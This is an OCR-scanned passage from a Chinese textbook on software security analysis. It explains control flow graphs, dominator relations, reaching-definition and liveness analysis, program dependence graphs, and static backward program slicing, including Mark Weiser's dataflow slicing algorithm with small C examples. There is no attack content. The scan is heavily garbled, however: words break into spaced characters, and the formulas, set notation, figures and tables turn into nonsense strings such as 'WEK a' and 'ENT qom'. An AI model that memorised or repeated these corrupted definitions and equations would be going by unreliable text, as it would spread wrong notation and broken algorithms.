示 结 束 基本 块 节点 。 程 序 执行 时 ,从 Entry 代表 的 基本 块 开始 执行 , 沿 着 控制 边 遍 历 执行 
基本 块 ,最 后 到 Exit 代表 的 基本 块 时 执行 结束 。 

前 面 已 经 非 正式 地 使 用 了 前 驱 和 后 继 的 概念 ,这 里 正式 给 出 其 定义 。 在 CFG 中 ,车 
存在 有 序 对 一 a 7 € E. Kr a bEV, WEK a 是 0 的 直接 前 驱 , 而 5 是 a 的 直接 后 继 。a 
的 所 有 直接 前 驱 的 集合 记 为 Pred(a) — (5€ V|—b.a7- € E) .a 的 所 有 后 继 的 集合 记 为 
Succ(a) — (b€ V| a,b € E). 

在 CFG 中 ,从 任意 节点 开始 进行 节点 遍历 会 形成 一 条 路 径 ,路 径 上 的 基本 块 串联 后 
可 以 形成 程序 的 一 条 执行 路 径 ,该 路 径 称 作 该 CFG 的 一 个 可 执行 路 径 。 

对 于 两 个 节点 a、.5, 如 果 从 开始 节点 Entry 到 节点 5 的 所 有 路 径 都 经 过 节点 a , 则 称 
节点 a 支配 节点 65, 并 称 节点 a 是 节点 4b 的 前 必 经 节点 , 记 为 a 一 5。 如 果 节 点 a 是 节点 6b 
的 前 必 经 节点 ,而 且 a 去 56, 则 称 a 是 5b 的 严格 前 必 经 节点 , 记 为 a 一 ,5b。 如 果 不 存 在 节点 
gq， 使 得 节点 apg ENT qom, WERI nx a 是 节点 的 严格 直接 前 必 经 节点 。 

同 理 可 以 给 出 后 必 经 节点 的 相关 定义 。 对 于 两 个 节点 a.5, 如 果 从 开始 节点 5 到 节 
点 Exit 的 所 有 路 径 都 经 过 节点 a, 则 称 节点 a 是 节点 5 的 后 必 经 节点 A bea, WR 
点 a 是 节点 2 的 后 必 经 节点 ,而 且 a 取 5, 则 称 a 是 2 的 严格 后 必 经 节点 , 记 为 6< 一 ,a。 如 果 
不 存在 节点 g, 使 得 节点 asa ,同时 basg, WERA a 是 节点 6 的 严格 直接 后 必 经 节点 。 

在 图 4-4 的 CFG 中 ,节点 1 是 2 和 3 的 严格 直接 前 必 经 节点 ,而 节点 4 是 2 和 3 的 严 
格 直接 后 必 经 节点 。 

2. 数据 流 分 析 

数据 流 分 析 关 注 的 是 跨越 多 条 语句 的 变量 定义 、 赋 值 和 运算 操作 ,但 是 由 于 变量 所 存 
储 的 数据 在 多 条 语句 中 是 动态 变化 的 ,难以 同时 进行 分 析 。 在 这 种 情况 下 (多 个 因素 施加 
影响 ) ,只 能 以 一 条 特定 语句 为 基准 点 进行 分 析 ( 其 他 语句 中 变量 的 变化 暂时 不 考虑 )。 针 
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对 C 语言 程序 ,一 条 语句 通常 都 会 有 引用 变量 和 定义 变量 的 双重 行为 。 因 此 自然 存在 两 
个 问题 , 即 该 语句 中 引用 的 变量 是 由 哪些 语句 定义 的 ,同时 该 语句 定义 的 变量 又 在 后 续 哪 
些 语句 被 引用 和 重新 定义 。 其 中 前 者 被 称 为 可 到 达 定 义 分 析 Creaching definition 
analysis) ,而 后 者 被 称 为 变量 活性 分 析 (liveness analysis)。 下 面 分 别 对 解决 这 两 个 问题 
的 方法 进行 阐述 。 

3. 可 到 达 定 义 

可 到 达 定 义 分 析 对 象 为 一 条 程序 语句 ,主要 目标 在 于 获取 该 语句 所 引用 变量 的 来 源 ， 
即 引 用 的 变量 是 如 何 产生 、 复 制 和 传递 的 。 针 对 C 语言 











Po 
程序 ,变量 在 定义 之 后 发 生 值 的 改变 只 有 两 种 可 能 ,一 种 da, 
是 该 变量 被 重新 定义 , 另 一 种 是 函数 调用 时 该 变量 以 传 Hr 
地 址 的 方式 作为 函数 参数 被 函数 内 部 代码 所 修改 。 本 书 
不 讨论 后 一 种 情况 。 | 

程序 在 其 中 某 条 语句 执行 前 后 的 状态 是 不 同 的 , 例 bz sa 一 一 
如 图 4-5 中 的 第 2 条 语句 ,该 语句 对 变量 b 赋值 ,在 该 语 | 
句 执行 后 变量 b 的 值 被 算术 表达 式 a 十 1 的 值 所 取代 。 " 
为 了 准确 地 刻画 程序 状态 ,针对 同一 条 语句 ,有 必要 对 其 B3 4:b=b+l 
执行 前 状态 和 执行 后 状态 进行 区 分 ,从 而 引入 路 径 的 定 | 
义 。 路 径 由 程序 中 连续 执行 的 代码 语句 位 置 的 序列 组 P, 
成 ,位 置 序列 长 度 为 n, 定 义 为 P，P:，…，P,。 其 中 i B4 — 55-54 
1,2,…,n,Pi 是 某 条 语句 s 执行 前 的 代码 位 置 ,而 P+; 是 Ps 





该 语句 执行 后 的 代码 位 置 。 如 图 4-5 中 示例 代码 所 示 ， 图 4-5 可 到 达 定义 示例 代码 
每 条 语句 前 后 都 有 对 应 的 代码 位 置 标识 ,分 别 为 P, Ps. 
P, P, ，P, ，Ps 。 程 序 执行 时 可 能 的 路 径 为 <P,, Pi» Pas Pas Pio PII XE Po, Pis Pz, 
P, Po, Pi, P2, P3, Pi, PB. 

在 给 出 路 径 概念 后 ,这 里 进一步 引入 到 达 和 可 到 达 定 义 的 概念 定义 , 即 针 对 变量 x 的 
一 个 定义 (这 里 “定义 ” 指 改 变 某 个 变量 的 值 的 语句 ) 语 句 s, 该 语句 的 定义 到 达 程 序 的 某 
个 代码 位 置 P, 当 且 仅 当 在 程序 控制 流 图 CCFG) 中 存在 从 该 定义 对 应 的 语句 到 位 置 P 语 
句 的 一 条 路 径 ,并 且 该 路 径 上 没有 变量 x 的 其 他 定义 ,同时 称 语句 s 是 代码 位 置 P 的 一 个 
可 到 达 定 义 。 例 如 ,语句 3 对 变量 a 进行 定义 ,而 且 语 句 4.5 都 没有 对 变量 a 进行 定义 ， 
那么 语句 3 就 是 代码 位 置 PS 、P, 的 一 个 可 到 达 定 义 。 

前 面 已 经 非 正式 使 用 了 定义 和 引用 这 两 个 概念 ,下 面 为 了 更 清楚 地 描述 可 到 达 定 义 
的 相关 概念 和 可 到 达 定 义 的 计算 方法 ,补充 给 出 变量 定义 和 引用 的 基本 概念 的 定义 。 

假定 某 个 变量 为 x, 则 x 有 定义 集 Def GO ,表示 定义 x 的 所 有 语句 的 集合 ,这 个 集合 
包含 任何 让 x 的 值 发 生变 化 的 语句 (如 简单 赋值 ,经 过 运算 以 后 的 赋值 语句 等 )。 此 外 ,用 
Use(x) 来 表示 变量 x 的 引用 集 , 即 任何 使 用 x 的 语句 的 集合 。 针 对 基本 块 也 有 类 似 的 定 
义 , 只 要 分 别 将 基本 块 内 所 有 变量 的 定义 集 和 引用 集 做 并 集 , 即 可 得 到 对 应 基本 块 的 定义 
集 和 引用 集 。 

假定 某 条 语句 用 s 表示 ,s 包含 的 变量 定义 和 使 用 可 以 引入 如 下 定义 : 


zas REUK 


产生 集 Gen(s): 所 有 由 s 给 出 的 变量 定义 所 在 的 语句 构成 的 集合 。 

WKE Kill(s)( 也 叫 杀 死 集 ): 若 s 重新 定义 变量 x, 而 x 此 前 由 语句 s 定义 , 则 称 s 
消灭 定义 s'。 所 有 由 s 消灭 的 定义 的 集合 称 为 s 的 消灭 集 。 

入 集 In(s): 所 有 在 语句 s 之 前 仍然 有 效 ( 没 有 被 消灭 ) 的 定义 语句 的 集合 。 

出 集 Out(s) : 所 有 离开 语句 s 的 定义 语句 的 集合 ,添加 s 产生 的 语句 ,同时 去 掉 语句 
s 所 消灭 的 定义 语句 。 

同样 ,一 个 基本 块 也 可 以 有 类 似 的 定义 ,以 基本 块 为 单元 计算 可 到 达 定 义 的 方法 
如 下 : 


算法 ”可 到 达 定义 的 计算 方法 
输入 : CFG G= (V, E, Entry,Exit) 
输出 : out 
begin 
for b in V: 
In(b)=ọ 
Out (b)=Gen (b) 
Change- true 
while Change: 
for b in V: 
In(b)-U (out (p) |for all p in Pred(b)) 
OldOut- Out (b) 
OldIn- In (b) 
Out (b) - Gen (b) U (In (b) - Kill (b)) 
if Out (b)- - OldOut and In (b)--OldIn: 
Change- false 
else 
Change- true 


end 

例如 ,针对 图 4-6 左 侧 代码 和 其 控制 流 图 计算 可 到 达 定 义 ,控制 流 图 中 代码 仅 包 含 赋 
值 . 计 算 操作 的 语句 ,一 共 划 分 为 4 个 基本 块 。 右 侧 为 其 可 到 达 定 义 计算 过 程 , 第 一 列 为 
基本 块 编号 ,其 他 列 中 的 数字 为 语句 编号 ,下 标 表示 其 迭代 轮 数 ,例如 Kill 表 示 初 始 消灭 
集 ,Out 表 示 第 一 轮 计 算得 到 的 出 集 。 当 和 迭代 计算 到 第 4 轮 时 入 集 和 出 集 与 第 3 轮 计算 
Zt WR] CIn; — In; ,Outs 二 Outs) ,可 到 达 定 义 的 计算 收 和 敛 。 























B1 Tal . 
2:b-al 基本 块 | Gen | Kill, | In; | Out; | m | Out, | In; | Out | In, | Out; 
' 
m Gad | BI |12 | 345 12 |3 | 12 | 23) 12 | 23 | 12 
B2 | 3 1 3 12| 23 | 12| 23 | 23 | 12 
B3 4:b=b+1 
' B3 | 4 2,5 4 23| 34 | 23| 34 | 23 | 34 
B4 Sb-b-4 B4 | 5 24 5 34| 35 | 34| 35 | 34 | 3.5 






































图 4-6 可 到 达 定 义 计算 过 程 示例 
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4. 活性 分 析 

活性 分 析 是 指 对 某 个 语句 定义 的 变量 是 否 在 后 续 语 句 中 被 引用 以 及 被 哪些 语句 引用 
的 情况 的 分 析 。 针 对 程序 的 某 条 语句 p 和 p 中 的 一 个 变量 x, 如 果 x 在 p 上 的 值 会 在 控 
制 流 图 中 从 p 出 发 的 某 条 路 径 上 使 用 ,就 称 x 在 p 上 是 活 


的 ,否则 称 x E p 上 是 死 的。 例如 ,在 图 4-7 所 示 的 程序 。“， zr 
片段 中 ,变量 a 在 语句 1 是 活 的 ,因为 变量 a 还 将 在 语句 2 w 
用 到 。 变 量 b 在 语句 2 也 是 活 的 ,因为 变量 b 还 将 在 语句 。 2 ba 


3 和 4 用 到 。 

活性 分 析 除 了 回答 变量 是 否 活跃 的 问题 ,还 要 关注 变 3 c=c+b 
量 在 哪个 范围 内 保持 活跃 , 即 活性 范围 。 活 性 范围 给 出 了 
针对 语句 p. ZEE v 在 后 续 语 句 中 继续 保持 活跃 的 语句 范 4 a-bi2 
围 。 例 如 针对 语句 1.28 ft a 在 语句 1 处 的 值 会 在 语句 4 








是 
处 重新 定义 ,因此 在 语句 3 及 其 后 续 语 句 都 不 是 活跃 的 ， ES | 
HR E2). FA, fe ifi] 2 处 ,变量 b 的 活性 s 
范围 是 (2 一 3 一 4)。 


printf("%d\n" c); 


本 节 不 给 出 活性 分 析 的 计算 方法 ,读者 可 参考 相关 书 $ 
籍 。 活 性 分 析 的 一 个 常见 用 途 是 在 编译 器 的 代码 生成 阶 图 4-7 活性 概念 示例 代码 片段 
段 用 于 基本 块 的 寄存 器 分 配 , 即 依据 变量 的 活性 进行 寄存 
器 分 配 的 优化 。 此 外 ,本 书 其 他 章节 介绍 的 污点 传播 分 析 方 法 也 与 活性 分 析 有 一 定 关 联 。 

5. 程序 依赖 图 

前 文中 详细 阐述 了 分 析 程 序 的 两 种 方式 , 即 控制 流 分 析 和 数据 流 分 析 。 这 两 种 分 析 
方法 分 别 建立 了 基本 块 (或 者 语句 ) 之 间 的 程序 执行 顺序 关系 以 及 程序 中 不 同 语句 对 同一 
变量 的 定义 -引用 关系 。 这 两 类 关系 从 本 质 上 来 说 都 是 两 个 语句 之 间 的 依赖 关系 。 为 了 
更 清晰 准确 地 描述 基本 块 ( 或 者 语句 ) 之 间 的 关系 ,本 节 引 入 控制 依赖 关系 和 数据 依赖 关 
系 , 并 进一步 介绍 能 够 同时 刻画 这 两 种 关系 的 程序 依赖 图 。 

“控制 依赖 ”从 字面 上 看 表示 两 个 基本 块 在 程序 流程 上 存在 的 依赖 关系 ,但 前 面 介 绍 
的 前 必 经 或 者 后 必 经 关系 并 不 等 价 于 控制 依赖 关系 ,还 需要 被 依赖 节点 能 够 决定 依赖 节 
点 的 执行 与 否 。 典 型 的 控制 依赖 关系 如 图 4-4 所 示 , 基 本 块 0 包含 一 个 让 语句 ,该 语句 的 
执行 结果 决定 后 续 将 执行 基本 块 1 还 是 基本 块 2, 因 此 基本 块 1 和 基本 块 2 都 是 控制 依 
赖 于 基本 块 0。 

由 上 所 述 , 设 a 和 2 为 某 程序 CFG 的 两 个 节点 , 若 5b 是 否 能 执行 取决 于 a 的 执行 结 
果 , 则 称 5 控制 依赖 于 a, 记 作 45>wa。 下 面 给 出 控制 依赖 关系 较为 严格 的 定义 。 

4 G 为 某 程 序 P 的 控制 流 图 ,其 中 a 和 2 是 G 中 的 两 个 节点 , 当 a Ro 满足 下 列 两 
个 条 件 时 , 则 有 baas 

OD 从 a 到 5b 有 一 条 可 执行 路 径 , 即 CFG 中 节点 a 与 节点 0 之 间 存 在 一 条 路 径 。 同 
时 ,对 于 该 路 径 上 除 ab 外 的 每 个 节点 ,节点 5 都 是 其 后 必 经 节点 。 

(2) 节点 5 不 是 a 的 后 必 经 节点 。 

通俗 地 说 , 即 如 果 6 控制 依赖 于 a , 则 要 求 a 与 5 之 间 可 达 ,a 至 少 有 两 个 直接 后 继 节 
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点 。 显 然 ,车 节点 是 节点 的 唯一 直接 后 继 , 则 o 并 不 控制 依赖 于 vw ,这 是 控制 依赖 关 
系 与 控制 流 图 中 节点 连接 关系 的 不 同 之 处 。 

对 于 C 语言 ,任何 语句 通常 最 多 只 有 一 个 直接 控制 依赖 语句 ,但 是 由 于 goto 语句 引 
起 的 控制 流转 移 不 受 结构 化 模式 的 约束 ,导致 控制 依赖 关系 十 分 复杂 ,这 里 不 子 讨论 。 

由 控制 依赖 关系 可 以 定义 控制 依赖 图 G=(V,C) ,其 中 V 是 程序 中 所 有 语句 (或 基本 
块 ) 对 应 节点 的 集合 ,C 是 控制 依赖 图 的 边 集合 。 如 果 有 节点 u 直接 控制 依赖 于 wv, 即 
ut av WÉ ul o 的 边 添加 到 C rp. 

“数据 依赖 "表示 程序 中 引用 某 变量 的 基本 块 (或 者 语句 ) 对 定义 该 变量 的 基本 块 的 依 
赖 , 即 是 一 种 “定义 -引用 ”依赖 关系 。 设 a 和 2 分 别 为 程序 P 控制 流 图 G 中 的 两 个 节点 ， 
v 为 P 中 的 一 个 变量 ,车 a 和 2 满足 下 列 条 件 , 则 称 5 关 于 变量 v 直接 数据 依赖 于 a , 记 为 
bays 

(OD a 对 变量 v 进行 定义 , 即 v€ Def (a). 

(2) 5 中 引用 了 变量 v, 即 vE Use(5). 

(3) a 到 4 有 一 条 可 执行 路 径 ,上 且 在 此 路 径 上 不 存在 语句 对 v 进行 定义 。 

显然 ,如 果 节 点 是 数据 依赖 于 节点 vw 的 , 则 节点 是 节点 的 一 个 可 到 达 定 义 。 

同样 ,由 数据 依赖 关系 可 以 定义 数据 依赖 图 G — CV. Do ,其 中 六 是 程序 中 所 有 语句 
(或 基本 块 ) 对 应 节点 的 集合 ,D 是 数据 依赖 图 的 边 集合 。 如 果 有 节点 u 直接 数据 依赖 于 
v BJ u> av WMH uS] o 的 边 添 加 到 了 中 。 

依据 以 上 两 种 依赖 关系 可 以 构建 出 程序 依赖 图 (PDG),PDG 由 程序 的 控制 依赖 图 和 
数据 依赖 图 组 成 。 若 G.=(V, C) ,Gs 二 (V,D) 分 别 为 程序 了 的 控制 依赖 图 和 数据 依赖 
图 , 则 程序 依赖 图 是 G =V., E), 其 中 E=CUDUX, 其 中 义 表 示 程 序 中 的 其 他 依赖 关 
系 。 程 序 依赖 图 示例 如 图 4-8 所 示 。 


1: intx-getch(); Entry 
2: inty-getch(); Wg 
3: inttmp-0; i Pad e um 5 
4 这 x>y) ~ 
Se 
Si imp-x; pM s N 
6: else ~ E 
7: tmp-y; Cu 
8: printf(" "oun" tmp); 8 


图 4-8 代码 片段 3 及 其 程序 依赖 图 


针对 C 语言 等 结构 化 程序 ,程序 依赖 图 通常 包含 过 程 内 依赖 图 和 过 程 间 依 赖 图 , 它 
们 分 别 表示 一 个 过 程 内 部 代码 的 依赖 图 和 包含 多 个 过 程 的 程序 依赖 图 。 本 书 暂 时 不 讨论 
包含 过 程 的 程序 依赖 图 。 
422 切片 的 基本 原理 


最 初 的 程序 切片 技术 应 用 于 软件 维护 阶段 的 排 错 调试 阶段 , 即 为 研发 人 员 提 供 一 种 
观察 和 理解 程序 的 方法 。 在 实际 的 程序 调试 过 程 中 ,通常 程序 员 只 关注 程序 的 部 分 行为 。 


软件 安全 分 析 与 应 用 


例如 针对 图 4-9 的 示例 程序 ,在 代码 第 12 行程 序 
会 在 控制 台 输 出 整数 变量 z 的 值 ,程序 员 发 现 z 的 
值 与 预期 不 符 , 那 么 通常 他 会 阅读 第 111 行 中 与 3 intei; 
z 相关 的 代码 来 确定 问题 的 原因 。 这 个 过 程 中 不 4 2-0 
相关 的 代码 会 造成 干扰 ,给 代码 阅读 理解 和 调试 排 了 一 getchar0); 
7: 
8: 
9: 





int main() { 
int x, y, Z; 


错 带 来 阻碍 ,尤其 是 针对 大 规模 程序 ,问题 更 严重 。 vida id 
由 此 产生 了 从 源 程序 中 自动 提取 与 z 相关 (给 z 新 i 
的 定义 值 ,或 者 引用 z 的 代码 ) 的 代码 的 要 求 。 这 
里 期 望 提取 出 的 感 兴趣 的 代码 片段 可 以 视 作 当前 | ey 
程序 全 部 代码 的 一 个 切片 ,而 “与 Zz 相关 ”可 以 视 作 12: printf( "%d\n" z); 
一 个 代码 过 滤 条 件 , 称 为 “切片 准则 ”。 TD 

切片 准则 包含 两 个 要 素 , 即 切片 目标 变量 (如 
AERE 2) ,以 及 开始 切片 的 代码 位 置 (如 z 所 在 的 代 
码 位 置 : 第 12 行 )。 严 格 来 说 ,程序 了 的 切片 准则 是 一 个 二 元 组 <n, V> ,其 中 站 是 程序 
中 一 条 语句 的 编号 ,V 是 切片 所 关注 的 变量 集合 ,该 集合 是 中 变量 的 一 个 子 集 。 

直观 来 看 ,“ 定 义 z 或 者 使 用 z” 的 切片 语句 可 以 利用 数据 依赖 和 控制 依赖 分 析 方 法 来 
获取 。 针 对 切片 准则 一 12,{z} 2 ,需要 提取 对 变量 有 影响 的 语句 ,那么 直接 给 z 赋值 的 
语句 (语句 4 和 10) 和 对 z 值 计算 有 影响 的 控制 依赖 语句 (语句 6 和 7) 就 应 当 包括 到 最 终 
的 切片 结果 中 ,如 图 4-10(a) 所 示 。 另 外 ,以 第 11 行 代码 中 的 变量 x 为 切片 准则 , 则 得 到 
的 切片 如 图 4-10 Cb) ron o 


else 











图 4-9 代码 片段 4 




















3: int i=0; 3: int i = 0; 

5: y = getchar(); 4: z=0; 

6: for(; i<100;i++) 6: for(; i<100:i++) 

7T. if (i%2 = 1) 7 if(i%2 = 1) 

8: x+=y*i; 9 else 

ii: printf" %d\n",x); 10: z+ l; 

12: printf(" 96d n" ,z); 

() XT «12, {z2} > 的 切片 (b) 关于 <11, {x}> 的 切片 


图 4-10 代码 片段 4 的 程序 切片 


程序 切片 通常 包括 3 个 步骤 , 即 程序 依赖 关系 提取 、 切 片 规则 制定 和 切片 生成 。 其 中 
程序 依赖 关系 提取 主要 是 从 程序 中 提取 各 类 信息 ,包括 控制 流 和 数据 流 信息 ,形成 程序 依 
赖 图 。 而 切片 规则 制定 则 主要 是 依据 具体 的 程序 分 析 需 求 设计 切片 准则 。 切 片 生成 则 主 
要 是 依据 前 述 的 切片 准则 选择 相应 的 程序 切片 方法 ,然后 对 第 一 步 中 提取 的 依赖 关系 进 
行 分 析 处 理 , 从 而 生成 程序 切片 。 其 一 般 过 程 如 图 4-11 所 示 。 

自从 程序 切片 技术 出 现 以 后 ,学 术 界 对 其 进行 了 广泛 深入 的 扩展 研究 ,切片 的 类 型 得 
到 了 极 大 丰富 。 按 照 不 同 的 分 类 标准 有 不 同 的 切片 类 型 。 如 果 按 照 是 否 在 切片 中 考虑 程 
序 的 具体 输入 , 则 可 以 划分 为 静态 切片 和 动态 切片 。 如 果 按 照 切片 要 提取 的 是 对 关注 变 
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fe 基本 块 ~> 控 制 流 图 -数据 
流 方程 


控制 人 HEK: HED AR 
id FORE 。 基 于 图 可 达 性 方法 


。 前 向 切片 ， 后 向 切片 








图 4-11 切片 的 一 般 过 程 


量 有 影响 的 代码 片段 还 是 被 关注 变量 所 影响 , 则 可 以 划分 为 后 向 切片 和 前 向 切片 。 按 照 
提取 的 切片 是 否 为 可 执行 程序 还 可 以 划分 为 可 执行 的 切片 和 不 可 执行 的 切片 (最 初 的 程 
序 切片 是 可 执行 的 ,同时 还 需要 与 原 程序 在 语义 上 保持 一 致 )。 前 述 示例 介绍 的 切片 是 最 
早 提出 的 一 种 切片 ,按照 后 来 的 分 类 方法 ,属于 静态 后 向 切片 。 此 外 ,还 有 很 多 其 他 切片 
类 型 ,如 有 条 件 切片 .前 片 和 砍 片 等 。 

本 书 只 就 经 典 的 程序 切片 方法 和 应 用 进行 介绍 ,分 别 对 静态 程序 切片 和 动态 程序 切 
片 (本 章 介 绍 的 切片 均 为 后 向 程序 切片 ) 的 方法 原理 和 简单 应 用 进行 介绍 。 读 者 可 阅读 其 
他 文献 以 了 解 关 于 切片 的 更 多 知识 。 


4.3 静态 程序 切片 


目前 静态 程序 切片 主要 有 两 种 方法 , 即 基于 数据 流 方程 的 切片 方法 和 基于 程序 依赖 
图 可 达 性 的 切片 方法 。 它 们 都 是 利用 数据 依赖 和 控制 依赖 关系 进行 分 析 以 获得 程序 
切片 。 

静态 程序 切片 要 针对 程序 的 所 有 可 能 执行 路 径 , 依 据 所 有 的 数据 依赖 和 路 径 依赖 以 
提取 与 切片 准则 关联 的 代码 片段 ,那么 能 否 获 得 最 小 的 切片 是 大 家 都 关注 的 重要 问题 。 
显然 ,获得 最 小 切片 的 算法 能 够 针对 每 一 条 程序 语句 判断 其 是 否 与 切片 准则 相关 。 针 对 
图 4-12 中 左 侧 的 代码 ,假设 切片 准则 为 <7, {fa} 二 ,由 于 第 5 行 代码 是 死 循环 ,第 6 行 语 
名 不 可 达 , 因 而 不 应 当 包 含 在 切片 中 。 而 如 果 针 对 图 4-12 右 侧 的 代码 ,第 5 行 代表 任意 
一 个 代码 块 , 则 切片 方法 必须 能 够 判断 其 是 否 能 够 执行 到 第 6 行 , 即 能 够 判断 第 5 行 是 否 
停机 ,显然 不 存在 能 够 判断 第 5 行 是 否 停机 的 方法 ,因此 也 不 存在 能 够 获取 程序 的 最 小 切 
片 的 方法 。 

由 于 不 存在 最 优 的 最 小 切片 方法 ,因此 本 书 介绍 的 切片 方法 均 为 偏 保守 的 近似 算法 ， 
只 能 保证 与 切片 准则 有 关联 的 代码 片段 都 包含 在 切片 中 ,因此 获得 的 切片 都 偏 大 。 


431 基于 数据 流 方程 的 切片 方法 
基于 数据 流 方 程 进 行 切 片 的 方法 主要 是 通过 迁 代 计 算 控制 流 图 中 每 个 节点 的 相关 变 
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1: int ab; 1: int ab; 
2: a- getchar(); 2: a- getchar(); 
3: b= getchar(); 3: b- getchar(); 
4: if(a>b) 4: if(a>b) 
5 while(1); 5 $999 * 
6: a-a*b 6: a-a*b 
} j 
7: printf(a); 7: printf(a); 














4-12 ”最 小 切片 计算 示例 


量 集合 ,迭代 分 析 语句 间 的 数据 依赖 关系 和 控制 依赖 关系 ,最终 获 得 每 条 语句 中 与 切片 准 
则 C 相关 的 变量 的 集合 。 

例如 ,在 图 4-13 的 示例 代码 中 ,对 于 切片 准则 二 10,{z}) 二 ,通过 数据 定义 和 引用 关 
系 ,比较 容易 发 现 语句 4 应 当 在 切片 中 。 通 过 控制 依赖 关系 , 则 语句 6 和 7 应 当 包含 在 切 
片 中 。 此 外 ,对 于 语句 6 和 7 中 的 变量 i, 由 于 其 通过 控制 关系 影响 了 z, 因 此 变量 i 的 数 
据 依 赖 关 系 和 控制 依赖 关系 也 应 当 被 纳入 考虑 ,这 样 就 需要 从 变量 i 开始 迭代 ,重新 获取 
其 数据 和 控制 依赖 的 语句 (语句 4)。 通 过 不 断 迭 代 , 最 终 得 到 关于 切片 准则 的 所 有 语句 。 

下 面 给 出 该 描述 该 算法 所 需 的 若干 定义 ,同时 结合 示例 对 其 进一步 说 明 。 示 例 代 码 
与 图 4-9 基本 相同 ,如 图 4-13 左 侧 所 示 , 右 侧 为 其 CFG, 图 中 节点 编号 为 语句 行 号 ,该 
CFG 中 每 个 C 语言 语句 作为 一 个 节点 ( 略 去 else 等 没有 实际 意义 的 节点 ) 。 


B 


图 4-13 代码 片段 4 及 其 CFG 


iaj: 在 程序 P 上 i 到 j 有 一 条 有 向 边 , 节 点 用 vw 来 表示 ,下 标 i 为 其 节点 编号 , 节 
点 11 到 节点 12 有 一 条 有 向 边 , 则 有 Un ctg V12 o 

Def(i) Ref (i): 前 面 已 经 定义 过 ,分 别 表示 节点 i 定义 的 变量 和 引用 的 变量 ,如 
Def(vs)= {x}, Ref (vs)= {zx,y,i}. 

Infi): 控制 依赖 于 i 的 节点 集合 ,如 Infl(u ) 一 {us vio) o 

Rt: 相关 变量 集合 ,其 中 上 标 k 为 0 表示 该 集合 中 的 变量 为 直接 相关 ,上 标 & 二 0 则 
表示 集合 中 的 变量 间接 相关 。 上 标 表示 和 迭代 计算 的 轮 数 , 即 该 集合 中 变量 与 切片 准则 的 
相关 度 ,k 越 小 相关 度 越 大 。 下 标 CRRI. C= <n V>. REGOWI Eo IR SH i 
的 语句 中 与 切片 准则 C 相关 的 变量 的 集合 ,下 述 所 列 公 式 中 i,j,6 等 字母 除非 特别 声明 ， 
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均 为 程序 节点 编号 。 
RN 的 计算 需要 选 代 多 轮 进行 计算 , 当 & 一 0 时 ,计算 公式 如 下 : 


U telueRefG) A CDefCO NRG z C») U lu | u € Def) AvxER2GO)} 


Victa 
(4-1) 
?H R70 时 ,计算 公式 如 下 : 


REG) = RE U U Re CO (4-2) 
be Bt 


切片 的 迭代 过 程 中 需要 利用 上 述 两 个 公式 针对 每 一 个 节点 进行 计算 ,以 获取 与 切片 
准则 相关 的 变量 。 其 中 第 二 个 公式 中 引入 了 了 , 它 表 示 切 片 准则 C 所 在 语句 的 控制 依赖 
语句 集合 ,该 符号 的 具体 定义 后 面 会 详细 说 明 ,这 里 可 以 暂 不 理会 。 下 面 首先 针对 
式 (4-1), 即 A=0 的 Re 的 计算 过 程 解释 如 下 。 

要 针对 每 个 节点 应 用 式 (4-1) 进 行 计算 ,假设 当前 要 计算 的 节点 是 V,, 则 其 相关 变量 
集合 为 ReCu)。 当 节点 V, 为 切片 准则 对 应 的 节点 nn 时 (条 件 aD Re GO = VAER: 这 里 
V. 是 切片 准则 中 的 变量 集合 ); 而 当 节 点 V, 不 为 n, 同 时 该 节点 的 直接 后 继 节 点 编号 为 m 
时 , 则 分 以 下 两 种 情况 进行 处 理 : 

CD 条 件 b: 如 果 某 个 变量 a 属于 Ref(V,), 并 且 存 在 变量 ww IA F Def.) JH. w 
同时 也 属于 Rè On) , 则 把 变量 a 添加 到 Rz(Cx) 。 通 俗 地 说 ,就 是 如 果 语 句 v 的 后 继 节 点 中 
的 引用 变量 在 语句 中 定义 了 , 则 把 语句 w 中 所 有 引用 的 变量 也 添加 到 相关 变量 集合 RE 
中 。 这 种 情况 对 应 于 式 (4-1) 的 前 半 部 分 。 

(2) 条 件 c: 如果 某 个 变量 a JF Re DO ,同时 该 变量 并 没有 被 语句 定义 , 则 将 该 
变量 添加 到 相关 变量 集合 Re 中 。 简 单 来 说 ,就 是 在 后 继 节 点 m 中 是 相关 变量 ,在 语句 
u 中 仍然 是 相关 变量 。 这 种 情况 对 应 于 式 (4-1) 的 后 半 部 分 。 

为 了 更 好 地 理解 上 述 相关 变量 的 计算 规则 ,这 里 再 举 一 个 简单 的 例子 。 如 图 4-14 所 
示 , 左 侧 为 3 条 语句 构成 的 代码 片段 , 右 侧 是 依据 切片 规则 二 3,{y} 二 计算 的 相关 变量 集 
合 ,这 3 条 语句 分 别 适用 于 上 述 的 3 种 条 件 。 

ih ges Rayx) ”适用 条 件 c 和 b 


2: ab o Rag 适用 条 件 c 
2M ra 适用 条 件 a 


图 4-14 ”相关 变量 计算 示例 


St: 直接 相关 语句 集合 ,该 集合 可 依据 直接 相关 变量 获得 ,即将 定义 了 相关 变量 的 语 
句 都 包含 在 内 ,可 以 用 公式 表示 如 下 : 
St = (i| 35;i—4j ADefG) N RECO z (21 (4-3) 
Be: 相关 分 支 语 句 集合 ,该 集合 需要 依据 直接 (或 间接 ) 相 关 语句 以 及 控制 依赖 关系 
获得 ,可 以 用 公式 表示 如 下 (以 二 0 为 例 ) : 
BE = {b | i € Infl(b),i€ SE) (4-4) 
St. 间接 相关 语句 集合 , 当 & 一 0 时 该 符号 表示 直接 相关 语句 集合 ,该 集合 的 计算 公 





SE! = BEU {i | Def() N RE! CO z E ij) (4-5) 
下 面 介绍 一 种 基于 数据 流 方程 进行 切片 的 经 典 算法 : Mark Weiser 数据 流 切 片 算法 。 
算法 Mark Weiser 数据 流 切 片 算 法 
输入 : 切片 准则 =n, V> 
输出 : Slice 
A) 第 一 次 计算 ,按照 式 (4-1) 和 式 (4-2) 计 算 直 接 相关 变量 和 语句 ,得 到 RE 和 Sh. 
(2) 进入 循环 。 

CD 依据 式 (4-3) 和 式 (4-4) 计 算 间 接 相关 变量 和 间接 相关 语句 ,得 到 Re 和 St。 

© 依据 式 (4-5) 把 控制 节点 添加 到 间接 相关 语句 中 ,同时 重新 计算 间接 相关 语句 。 
© 如 果 St 增 大 , 则 重复 执行 第 @ 步 。 

下 面 以 图 4-13 给 出 的 代码 为 例 说 明 数 据 流 方程 求解 切片 的 过 程 ,如 表 4-2 至 表 4-4 

所 示 。 切 片 准 则 为 二 12,{z}) 二 。 
































































































































表 4-2 第 一 轮 
语句 编号 
计算 项 目 
12 11 10 8 7 6 s 4 3 2 
Rt z z z z z z z z z z 
Sè 4, 10, 12 
表 4-3 第 二 轮 
语句 编号 
